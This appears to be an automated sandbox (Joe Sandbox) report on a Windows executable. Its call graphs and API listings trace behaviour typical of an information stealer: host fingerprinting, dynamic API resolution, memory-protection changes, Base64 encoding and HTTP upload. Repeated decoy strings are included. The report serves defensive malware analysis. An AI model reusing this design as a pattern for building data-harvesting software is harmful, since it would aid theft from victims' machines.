GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14967->15628 14970 1da9b0 4 API calls 14971 1d1e19 14970->14971 14972 1da8a0 lstrcpy 14971->14972 14973 1d1e22 14972->14973 14974 1da9b0 4 API calls 14973->14974 14975 1d1e41 14974->14975 14976 1da8a0 lstrcpy 14975->14976 14977 1d1e4a 14976->14977 14978 1da9b0 4 API calls 14977->14978 14979 1d1e6b 14978->14979 14980 1da8a0 lstrcpy 14979->14980 14981 1d1e74 14980->14981 15630 1d7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14981->15630 14984 1da9b0 4 API calls 14985 1d1e94 14984->14985 14986 1da8a0 lstrcpy 14985->14986 14987 1d1e9d 14986->14987 14988 1da9b0 4 API calls 14987->14988 14989 1d1ebc 14988->14989 14990 1da8a0 lstrcpy 14989->14990 14991 1d1ec5 14990->14991 14992 1da9b0 4 API calls 14991->14992 14993 1d1ee5 14992->14993 14994 1da8a0 lstrcpy 14993->14994 14995 1d1eee 14994->14995 15633 1d7b00 GetUserDefaultLocaleName 14995->15633 14998 1da9b0 4 API calls 14999 1d1f0e 14998->14999 15000 1da8a0 lstrcpy 14999->15000 15001 1d1f17 15000->15001 15002 1da9b0 4 API calls 15001->15002 15003 1d1f36 15002->15003 15004 1da8a0 lstrcpy 15003->15004 15005 1d1f3f 15004->15005 15006 1da9b0 4 API calls 15005->15006 15007 1d1f60 15006->15007 15008 1da8a0 lstrcpy 15007->15008 15009 1d1f69 15008->15009 15637 1d7b90 15009->15637 15011 1d1f80 15012 1da920 3 API calls 15011->15012 15013 1d1f93 15012->15013 15014 1da8a0 lstrcpy 15013->15014 15015 1d1f9c 15014->15015 15016 1da9b0 4 API calls 15015->15016 15017 1d1fc6 15016->15017 15018 1da8a0 lstrcpy 15017->15018 15019 1d1fcf 15018->15019 15020 1da9b0 4 API calls 15019->15020 15021 1d1fef 15020->15021 15022 1da8a0 lstrcpy 15021->15022 15023 1d1ff8 15022->15023 15649 1d7d80 GetSystemPowerStatus 15023->15649 15026 1da9b0 4 API calls 15027 1d2018 15026->15027 15028 1da8a0 lstrcpy 15027->15028 15029 1d2021 15028->15029 15030 1da9b0 4 API calls 15029->15030 15031 1d2040 15030->15031 15032 1da8a0 lstrcpy 15031->15032 15033 1d2049 15032->15033 15034 1da9b0 4 API calls 15033->15034 15035 1d206a 15034->15035 15036 1da8a0 lstrcpy 15035->15036 15037 1d2073 15036->15037 15038 1d207e GetCurrentProcessId 15037->15038 15651 1d9470 OpenProcess 15038->15651 15041 1da920 3 API calls 15042 1d20a4 15041->15042 15043 1da8a0 lstrcpy 15042->15043 15044 1d20ad 15043->15044 15045 1da9b0 4 API calls 15044->15045 15046 1d20d7 15045->15046 15047 1da8a0 lstrcpy 15046->15047 15048 1d20e0 15047->15048 15049 1da9b0 4 API calls 15048->15049 15050 1d2100 15049->15050 15051 1da8a0 lstrcpy 15050->15051 15052 1d2109 15051->15052 15656 1d7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15052->15656 15055 1da9b0 4 API calls 15056 1d2129 15055->15056 15057 1da8a0 lstrcpy 15056->15057 15058 1d2132 15057->15058 15059 1da9b0 4 API calls 15058->15059 15060 1d2151 15059->15060 15061 1da8a0 lstrcpy 15060->15061 15062 1d215a 15061->15062 15063 1da9b0 4 API calls 15062->15063 15064 1d217b 15063->15064 15065 1da8a0 lstrcpy 15064->15065 15066 1d2184 15065->15066 15660 1d7f60 15066->15660 15069 1da9b0 4 API calls 15070 1d21a4 15069->15070 15071 1da8a0 lstrcpy 15070->15071 15072 1d21ad 15071->15072 15073 1da9b0 4 API calls 15072->15073 15074 1d21cc 15073->15074 15075 1da8a0 lstrcpy 15074->15075 15076 1d21d5 15075->15076 15077 1da9b0 4 API calls 15076->15077 15078 1d21f6 15077->15078 15079 1da8a0 lstrcpy 15078->15079 15080 1d21ff 15079->15080 15673 1d7ed0 GetSystemInfo wsprintfA 15080->15673 15083 1da9b0 4 API calls 15084 1d221f 15083->15084 15085 1da8a0 lstrcpy 15084->15085 15086 1d2228 15085->15086 15087 1da9b0 4 API calls 15086->15087 15088 1d2247 15087->15088 15089 1da8a0 lstrcpy 15088->15089 15090 1d2250 15089->15090 15091 1da9b0 4 API calls 15090->15091 15092 1d2270 15091->15092 15093 1da8a0 lstrcpy 15092->15093 15094 1d2279 15093->15094 15675 1d8100 GetProcessHeap RtlAllocateHeap 15094->15675 15097 1da9b0 4 API calls 15098 1d2299 15097->15098 15099 1da8a0 lstrcpy 15098->15099 15100 1d22a2 15099->15100 15101 1da9b0 4 API calls 15100->15101 15102 1d22c1 15101->15102 15103 1da8a0 lstrcpy 15102->15103 15104 1d22ca 15103->15104 15105 1da9b0 4 API calls 15104->15105 15106 1d22eb 15105->15106 15107 1da8a0 lstrcpy 15106->15107 15108 1d22f4 15107->15108 15681 1d87c0 15108->15681 15111 1da920 3 API calls 15112 1d231e 15111->15112 15113 1da8a0 lstrcpy 15112->15113 15114 1d2327 15113->15114 15115 1da9b0 4 API calls 15114->15115 15116 1d2351 15115->15116 15117 1da8a0 lstrcpy 15116->15117 15118 1d235a 15117->15118 15119 1da9b0 4 API calls 15118->15119 15120 1d237a 15119->15120 15121 1da8a0 lstrcpy 15120->15121 15122 1d2383 15121->15122 15123 1da9b0 4 API calls 15122->15123 15124 1d23a2 15123->15124 15125 1da8a0 lstrcpy 15124->15125 15126 1d23ab 15125->15126 15686 1d81f0 15126->15686 15128 1d23c2 15129 1da920 3 API calls 15128->15129 15130 1d23d5 15129->15130 15131 1da8a0 lstrcpy 15130->15131 15132 1d23de 15131->15132 15133 1da9b0 4 API calls 15132->15133 15134 1d240a 15133->15134 15135 1da8a0 lstrcpy 15134->15135 15136 1d2413 15135->15136 15137 1da9b0 4 API calls 15136->15137 15138 1d2432 15137->15138 15139 1da8a0 lstrcpy 15138->15139 15140 1d243b 15139->15140 15141 1da9b0 4 API calls 15140->15141 15142 1d245c 15141->15142 15143 1da8a0 lstrcpy 15142->15143 15144 1d2465 15143->15144 15145 1da9b0 4 API calls 15144->15145 15146 1d2484 15145->15146 15147 1da8a0 lstrcpy 15146->15147 15148 1d248d 15147->15148 15149 1da9b0 4 API calls 15148->15149 15150 1d24ae 15149->15150 15151 1da8a0 lstrcpy 15150->15151 15152 1d24b7 15151->15152 15694 1d8320 15152->15694 15154 1d24d3 15155 1da920 3 API calls 15154->15155 15156 1d24e6 15155->15156 15157 1da8a0 lstrcpy 15156->15157 15158 1d24ef 15157->15158 15159 1da9b0 4 API calls 15158->15159 15160 1d2519 15159->15160 15161 1da8a0 lstrcpy 15160->15161 15162 1d2522 15161->15162 15163 1da9b0 4 API calls 15162->15163 15164 1d2543 15163->15164 15165 1da8a0 lstrcpy 15164->15165 15166 1d254c 15165->15166 15167 1d8320 17 API calls 15166->15167 15168 1d2568 15167->15168 15169 1da920 3 API calls 15168->15169 15170 1d257b 15169->15170 15171 1da8a0 lstrcpy 15170->15171 15172 1d2584 15171->15172 15173 1da9b0 4 API calls 15172->15173 15174 1d25ae 15173->15174 15175 1da8a0 lstrcpy 15174->15175 15176 1d25b7 15175->15176 15177 1da9b0 4 API calls 15176->15177 15178 1d25d6 15177->15178 15179 1da8a0 lstrcpy 15178->15179 15180 1d25df 15179->15180 15181 1da9b0 4 API calls 15180->15181 15182 1d2600 15181->15182 15183 1da8a0 lstrcpy 15182->15183 15184 1d2609 15183->15184 15730 1d8680 15184->15730 15186 1d2620 15187 1da920 3 API calls 15186->15187 15188 1d2633 15187->15188 15189 1da8a0 lstrcpy 15188->15189 15190 1d263c 15189->15190 15191 1d265a lstrlen 15190->15191 15192 1d266a 15191->15192 15193 1da740 lstrcpy 15192->15193 15194 1d267c 15193->15194 15195 1c1590 lstrcpy 15194->15195 15196 1d268d 15195->15196 15740 1d5190 15196->15740 15198 1d2699 15198->13630 15928 1daad0 15199->15928 15201 1c5009 InternetOpenUrlA 15205 1c5021 15201->15205 15202 1c502a InternetReadFile 15202->15205 15203 1c50a0 InternetCloseHandle InternetCloseHandle 15204 1c50ec 15203->15204 15204->13634 15205->15202 15205->15203 15929 1c98d0 15206->15929 15208 1d0759 15209 1d077d 15208->15209 15210 1d0a38 15208->15210 15212 1d0799 StrCmpCA 15209->15212 15211 1c1590 lstrcpy 15210->15211 15213 1d0a49 15211->15213 15215 1d0843 15212->15215 15216 1d07a8 15212->15216 16105 1d0250 15213->16105 15219 1d0865 StrCmpCA 15215->15219 15218 1da7a0 lstrcpy 15216->15218 15220 1d07c3 15218->15220 15221 1d0874 15219->15221 15258 1d096b 15219->15258 15222 1c1590 lstrcpy 15220->15222 15223 1da740 lstrcpy 15221->15223 15224 1d080c 15222->15224 15226 1d0881 15223->15226 15227 1da7a0 lstrcpy 15224->15227 15225 1d099c StrCmpCA 15228 1d09ab 15225->15228 15229 1d0a2d 15225->15229 15230 1da9b0 4 API calls 15226->15230 15231 1d0823 15227->15231 15232 1c1590 lstrcpy 15228->15232 15229->13638 15233 1d08ac 15230->15233 15234 1da7a0 lstrcpy 15231->15234 15235 1d09f4 15232->15235 15236 1da920 3 API calls 15233->15236 15237 1d083e 15234->15237 15238 1da7a0 lstrcpy 15235->15238 15239 1d08b3 15236->15239 15932 1cfb00 15237->15932 15241 1d0a0d 15238->15241 15242 1da9b0 4 API calls 15239->15242 15243 1da7a0 lstrcpy 15241->15243 15244 1d08ba 15242->15244 15245 1d0a28 15243->15245 15246 1da8a0 lstrcpy 15244->15246 16048 1d0030 15245->16048 15258->15225 15580 1da7a0 lstrcpy 15579->15580 15581 1c1683 15580->15581 15582 1da7a0 lstrcpy 15581->15582 15583 1c1695 15582->15583 15584 1da7a0 lstrcpy 15583->15584 15585 1c16a7 15584->15585 15586 1da7a0 lstrcpy 15585->15586 15587 1c15a3 15586->15587 15587->14461 15589 1c47c6 15588->15589 15590 1c4838 lstrlen 15589->15590 15614 1daad0 15590->15614 15592 1c4848 InternetCrackUrlA 15593 1c4867 15592->15593 15593->14538 15595 1da740 lstrcpy 15594->15595 15596 1d8b74 15595->15596 15597 1da740 lstrcpy 15596->15597 15598 1d8b82 GetSystemTime 15597->15598 15600 1d8b99 15598->15600 15599 1da7a0 lstrcpy 15601 1d8bfc 15599->15601 15600->15599 15601->14553 15603 1da931 15602->15603 15604 1da988 15603->15604 15606 1da968 lstrcpy lstrcat 15603->15606 15605 1da7a0 lstrcpy 15604->15605 15607 1da994 15605->15607 15606->15604 15607->14556 15608->14671 15610 1c9af9 LocalAlloc 15609->15610 15611 1c4eee 15609->15611 15610->15611 15612 1c9b14 CryptStringToBinaryA 15610->15612 15611->14559 15611->14561 15612->15611 15613 1c9b39 LocalFree 15612->15613 15613->15611 15614->15592 15615->14681 15616->14822 15617->14824 15618->14832 15747 1d77a0 15619->15747 15622 1d1c1e 15622->14914 15623 1d76c6 RegOpenKeyExA 15624 1d7704 RegCloseKey 15623->15624 15625 1d76e7 RegQueryValueExA 15623->15625 15624->15622 15625->15624 15627 1d1c99 15626->15627 15627->14928 15629 1d1e09 15628->15629 15629->14970 15631 1d7a9a wsprintfA 15630->15631 15632 1d1e84 15630->15632 15631->15632 15632->14984 15634 1d7b4d 15633->15634 15635 1d1efe 15633->15635 15754 1d8d20 LocalAlloc CharToOemW 15634->15754 15635->14998 15638 1da740 lstrcpy 15637->15638 15639 1d7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15638->15639 15648 1d7c25 15639->15648 15640 1d7d18 15642 1d7d1e LocalFree 15640->15642 15643 1d7d28 15640->15643 15641 1d7c46 GetLocaleInfoA 15641->15648 15642->15643 15644 1da7a0 lstrcpy 15643->15644 15647 1d7d37 15644->15647 15645 1da8a0 lstrcpy 15645->15648 15646 1da9b0 lstrcpy lstrlen lstrcpy lstrcat 15646->15648 15647->15011 15648->15640 15648->15641 15648->15645 15648->15646 15650 1d2008 15649->15650 15650->15026 15652 1d94b5 15651->15652 15653 1d9493 GetModuleFileNameExA CloseHandle 15651->15653 15654 1da740 lstrcpy 15652->15654 15653->15652 15655 1d2091 15654->15655 15655->15041 15657 1d7e68 RegQueryValueExA 15656->15657 15658 1d2119 15656->15658 15659 1d7e8e RegCloseKey 15657->15659 15658->15055 15659->15658 15661 1d7fb9 GetLogicalProcessorInformationEx 15660->15661 15662 1d7fd8 GetLastError 15661->15662 15665 1d8029 15661->15665 15671 1d8022 15662->15671 15672 1d7fe3 15662->15672 15666 1d89f0 2 API calls 15665->15666 15668 1d807b 15666->15668 15667 1d89f0 2 API calls 15669 1d2194 15667->15669 15670 1d8084 wsprintfA 15668->15670 15668->15671 15669->15069 15670->15669 15671->15667 15671->15669 15672->15661 15672->15669 15755 1d89f0 15672->15755 15758 1d8a10 GetProcessHeap RtlAllocateHeap 15672->15758 15674 1d220f 15673->15674 15674->15083 15676 1d89b0 15675->15676 15677 1d814d GlobalMemoryStatusEx 15676->15677 15678 1d8163 15677->15678 15679 1d819b wsprintfA 15678->15679 15680 1d2289 15679->15680 15680->15097 15682 1d87fb GetProcessHeap RtlAllocateHeap wsprintfA 15681->15682 15684 1da740 lstrcpy 15682->15684 15685 1d230b 15684->15685 15685->15111 15687 1da740 lstrcpy 15686->15687 15691 1d8229 15687->15691 15688 1d8263 15690 1da7a0 lstrcpy 15688->15690 15689 1da9b0 lstrcpy lstrlen lstrcpy lstrcat 15689->15691 15692 1d82dc 15690->15692 15691->15688 15691->15689 15693 1da8a0 lstrcpy 15691->15693 15692->15128 15693->15691 15695 1da740 lstrcpy 15694->15695 15696 1d835c RegOpenKeyExA 15695->15696 15697 1d83ae 15696->15697 15698 1d83d0 15696->15698 15699 1da7a0 lstrcpy 15697->15699 15700 1d83f8 RegEnumKeyExA 15698->15700 15701 1d8613 RegCloseKey 15698->15701 15710 1d83bd 15699->15710 15702 1d843f wsprintfA RegOpenKeyExA 15700->15702 15703 1d860e 15700->15703 15704 1da7a0 lstrcpy 15701->15704 15705 1d8485 RegCloseKey RegCloseKey 15702->15705 15706 1d84c1 RegQueryValueExA 15702->15706 15703->15701 15704->15710 15707 1da7a0 lstrcpy 15705->15707 15708 1d84fa lstrlen 15706->15708 15709 1d8601 RegCloseKey 15706->15709 15707->15710 15708->15709 15711 1d8510 15708->15711 15709->15703 15710->15154 15712 1da9b0 4 API calls 15711->15712 15713 1d8527 15712->15713 15714 1da8a0 lstrcpy 15713->15714 15715 1d8533 15714->15715 15716 1da9b0 4 API calls 15715->15716 15717 1d8557 15716->15717 15718 1da8a0 lstrcpy 15717->15718 15719 1d8563 15718->15719 15720 1d856e RegQueryValueExA 15719->15720 15720->15709 15721 1d85a3 15720->15721 15722 1da9b0 4 API calls 15721->15722 15723 1d85ba 15722->15723 15724 1da8a0 lstrcpy 15723->15724 15725 1d85c6 15724->15725 15726 1da9b0 4 API calls 15725->15726 15727 1d85ea 15726->15727 15728 1da8a0 lstrcpy 15727->15728 15729 1d85f6 15728->15729 15729->15709 15731 1da740 lstrcpy 15730->15731 15732 1d86bc CreateToolhelp32Snapshot Process32First 15731->15732 15733 1d875d CloseHandle 15732->15733 15734 1d86e8 Process32Next 15732->15734 15735 1da7a0 lstrcpy 15733->15735 15734->15733 15739 1d86fd 15734->15739 15738 1d8776 15735->15738 15736 1da9b0 lstrcpy lstrlen lstrcpy lstrcat 15736->15739 15737 1da8a0 lstrcpy 15737->15739 15738->15186 15739->15734 15739->15736 15739->15737 15741 1da7a0 lstrcpy 15740->15741 15742 1d51b5 15741->15742 15743 1c1590 lstrcpy 15742->15743 15744 1d51c6 15743->15744 15759 1c5100 15744->15759 15746 1d51cf 15746->15198 15750 1d7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15747->15750 15749 1d76b9 15749->15622 15749->15623 15751 1d7765 RegQueryValueExA 15750->15751 15752 1d7780 RegCloseKey 15750->15752 15751->15752 15753 1d7793 15752->15753 15753->15749 15754->15635 15756 1d8a0c 15755->15756 15757 1d89f9 GetProcessHeap HeapFree 15755->15757 15756->15672 15757->15756 15758->15672 15760 1da7a0 lstrcpy 15759->15760 15761 1c5119 15760->15761 15762 1c47b0 2 API calls 15761->15762 15763 1c5125 15762->15763 15919 1d8ea0 15763->15919 15765 1c5184 15766 1c5192 lstrlen 15765->15766 15767 1c51a5 15766->15767 15768 1d8ea0 4 API calls 15767->15768 15769 1c51b6 15768->15769 15770 1da740 lstrcpy 15769->15770 15771 1c51c9 15770->15771 15772 1da740 lstrcpy 15771->15772 15773 1c51d6 15772->15773 15774 1da740 lstrcpy 15773->15774 15775 1c51e3 15774->15775 15776 1da740 lstrcpy 15775->15776 15777 1c51f0 15776->15777 15778 1da740 lstrcpy 15777->15778 15779 1c51fd InternetOpenA StrCmpCA 15778->15779 15780 1c522f 15779->15780 15781 1c58c4 InternetCloseHandle 15780->15781 15782 1d8b60 3 API calls 15780->15782 15788 1c58d9 codecvt 15781->15788 15783 1c524e 15782->15783 15784 1da920 3 API calls 15783->15784 15785 1c5261 15784->15785 15786 1da8a0 lstrcpy 15785->15786 15787 1c526a 15786->15787 15789 1da9b0 4 API calls 15787->15789 15792 1da7a0 lstrcpy 15788->15792 15790 1c52ab 15789->15790 15791 1da920 3 API calls 15790->15791 15793 1c52b2 15791->15793 15800 1c5913 15792->15800 15794 1da9b0 4 API calls 15793->15794 15795 1c52b9 15794->15795 15796 1da8a0 lstrcpy 15795->15796 15797 1c52c2 15796->15797 15798 1da9b0 4 API calls 15797->15798 15799 1c5303 15798->15799 15801 1da920 3 API calls 15799->15801 15800->15746 15802 1c530a 15801->15802 15803 1da8a0 lstrcpy 15802->15803 15804 1c5313 15803->15804 15805 1c5329 InternetConnectA 15804->15805 15805->15781 15806 1c5359 HttpOpenRequestA 15805->15806 15808 1c58b7 InternetCloseHandle 15806->15808 15809 1c53b7 15806->15809 15808->15781 15810 1da9b0 4 API calls 15809->15810 15811 1c53cb 15810->15811 15812 1da8a0 lstrcpy 15811->15812 15813 1c53d4 15812->15813 15814 1da920 3 API calls 15813->15814 15815 1c53f2 15814->15815 15816 1da8a0 lstrcpy 15815->15816 15817 1c53fb 15816->15817 15818 1da9b0 4 API calls 15817->15818 15819 1c541a 15818->15819 15820 1da8a0 lstrcpy 15819->15820 15821 1c5423 15820->15821 15822 1da9b0 4 API calls 15821->15822 15823 1c5444 15822->15823 15824 1da8a0 lstrcpy 15823->15824 15825 1c544d 15824->15825 15826 1da9b0 4 API calls 15825->15826 15827 1c546e 15826->15827 15828 1da8a0 lstrcpy 15827->15828 15920 1d8ead CryptBinaryToStringA 15919->15920 15921 1d8ea9 15919->15921 15920->15921 15922 1d8ece GetProcessHeap RtlAllocateHeap 15920->15922 15921->15765 15922->15921 15923 1d8ef4 codecvt 15922->15923 15924 1d8f05 CryptBinaryToStringA 15923->15924 15924->15921 15928->15201 16171 1c9880 15929->16171 15931 1c98e1 15931->15208 15933 1da740 lstrcpy 15932->15933 15934 1cfb16 15933->15934 16049 1da740 lstrcpy 16048->16049 16106 1da740 lstrcpy 16105->16106 16107 1d0266 16106->16107 16108 1d8de0 2 API calls 16107->16108 16109 1d027b 16108->16109 16110 1da920 3 API calls 16109->16110 16111 1d028b 16110->16111 16112 1da8a0 lstrcpy 16111->16112 16113 1d0294 16112->16113 16114 1da9b0 4 API calls 16113->16114 16115 1d02b8 16114->16115 16172 1c988d 16171->16172 16175 1c6fb0 16172->16175 16174 1c98ad codecvt 16174->15931 16178 1c6d40 16175->16178 16179 1c6d63 16178->16179 16190 1c6d59 16178->16190 16179->16190 16192 1c6660 16179->16192 16181 1c6dbe 16181->16190 16198 1c69b0 16181->16198 16183 1c6e2a 16184 1c6ee6 VirtualFree 16183->16184 16186 1c6ef7 16183->16186 16183->16190 16184->16186 16185 1c6f41 16187 1d89f0 2 API calls 16185->16187 16185->16190 16186->16185 16188 1c6f38 16186->16188 16189 1c6f26 FreeLibrary 16186->16189 16187->16190 16191 1d89f0 2 API calls 16188->16191 16189->16186 16190->16174 16191->16185 16195 1c668f VirtualAlloc 16192->16195 16194 1c6730 16196 1c673c 16194->16196 16197 1c6743 VirtualAlloc 16194->16197 16195->16194 16195->16196 16196->16181 16197->16196 16199 1c69c9 16198->16199 16203 1c69d5 16198->16203 16200 1c6a09 LoadLibraryA 16199->16200 16199->16203 16201 1c6a32 16200->16201 16200->16203 16205 1c6ae0 16201->16205 16208 1d8a10 GetProcessHeap RtlAllocateHeap 16201->16208 16203->16183 16204 1c6ba8 GetProcAddress 16204->16203 16204->16205 16205->16203 16205->16204 16206 1d89f0 2 API calls 16206->16205 16207 1c6a8b 16207->16203 16207->16206 16208->16207

                              Executed Functions

                              Function 001D9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 1d9860-1d9874 call 1d9750 663 1d987a-1d9a8e call 1d9780 GetProcAddress * 21 660->663 664 1d9a93-1d9af2 LoadLibraryA * 5 660->664 663->664 666 1d9b0d-1d9b14 664->666 667 1d9af4-1d9b08 GetProcAddress 664->667 669 1d9b46-1d9b4d 666->669 670 1d9b16-1d9b41 GetProcAddress * 2 666->670 667->666 671 1d9b4f-1d9b63 GetProcAddress 669->671 672 1d9b68-1d9b6f 669->672 670->669 671->672 673 1d9b89-1d9b90 672->673 674 1d9b71-1d9b84 GetProcAddress 672->674 675 1d9bc1-1d9bc2 673->675 676 1d9b92-1d9bbc GetProcAddress * 2 673->676 674->673 676->675
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,014A23B0), ref: 001D98A1
                              • GetProcAddress.KERNEL32(74DD0000,014A2308), ref: 001D98BA
                              • GetProcAddress.KERNEL32(74DD0000,014A2440), ref: 001D98D2
                              • GetProcAddress.KERNEL32(74DD0000,014A2458), ref: 001D98EA
                              • GetProcAddress.KERNEL32(74DD0000,014A22A8), ref: 001D9903
                              • GetProcAddress.KERNEL32(74DD0000,014A90C8), ref: 001D991B
                              • GetProcAddress.KERNEL32(74DD0000,01495910), ref: 001D9933
                              • GetProcAddress.KERNEL32(74DD0000,01495750), ref: 001D994C
                              • GetProcAddress.KERNEL32(74DD0000,014A2470), ref: 001D9964
                              • GetProcAddress.KERNEL32(74DD0000,014A24D0), ref: 001D997C
                              • GetProcAddress.KERNEL32(74DD0000,014A2488), ref: 001D9995
                              • GetProcAddress.KERNEL32(74DD0000,014A2248), ref: 001D99AD
                              • GetProcAddress.KERNEL32(74DD0000,014958D0), ref: 001D99C5
                              • GetProcAddress.KERNEL32(74DD0000,014A2278), ref: 001D99DE
                              • GetProcAddress.KERNEL32(74DD0000,014A22C0), ref: 001D99F6
                              • GetProcAddress.KERNEL32(74DD0000,01495770), ref: 001D9A0E
                              • GetProcAddress.KERNEL32(74DD0000,014A22D8), ref: 001D9A27
                              • GetProcAddress.KERNEL32(74DD0000,014A22F0), ref: 001D9A3F
                              • GetProcAddress.KERNEL32(74DD0000,014959F0), ref: 001D9A57
                              • GetProcAddress.KERNEL32(74DD0000,014A2320), ref: 001D9A70
                              • GetProcAddress.KERNEL32(74DD0000,01495790), ref: 001D9A88
                              • LoadLibraryA.KERNEL32(014A2578,?,001D6A00), ref: 001D9A9A
                              • LoadLibraryA.KERNEL32(014A2518,?,001D6A00), ref: 001D9AAB
                              • LoadLibraryA.KERNEL32(014A25A8,?,001D6A00), ref: 001D9ABD
                              • LoadLibraryA.KERNEL32(014A2560,?,001D6A00), ref: 001D9ACF
                              • LoadLibraryA.KERNEL32(014A2530,?,001D6A00), ref: 001D9AE0
                              • GetProcAddress.KERNEL32(75A70000,014A2548), ref: 001D9B02
                              • GetProcAddress.KERNEL32(75290000,014A2590), ref: 001D9B23
                              • GetProcAddress.KERNEL32(75290000,014A25C0), ref: 001D9B3B
                              • GetProcAddress.KERNEL32(75BD0000,014A25D8), ref: 001D9B5D
                              • GetProcAddress.KERNEL32(75450000,014957B0), ref: 001D9B7E
                              • GetProcAddress.KERNEL32(76E90000,014A8F08), ref: 001D9B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 001D9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 001D9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 409d7b41d31482bb73a921a3eac332a1044700b57909e0d1321c65122524f687
                              • Instruction ID: fccb3a82c38195e7210a6b9f0efa5573c060493838ed285e558975015b4c5420
                              • Opcode Fuzzy Hash: 409d7b41d31482bb73a921a3eac332a1044700b57909e0d1321c65122524f687
                              • Instruction Fuzzy Hash: ECA16CB6510340AFD344EFA8FF88A6677F9F78C301704C53AA605E3264D7399865CB5A
                              Function 001C45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 1c45c0-1c4695 RtlAllocateHeap 781 1c46a0-1c46a6 764->781 782 1c46ac-1c474a 781->782 783 1c474f-1c47a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001C479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4678
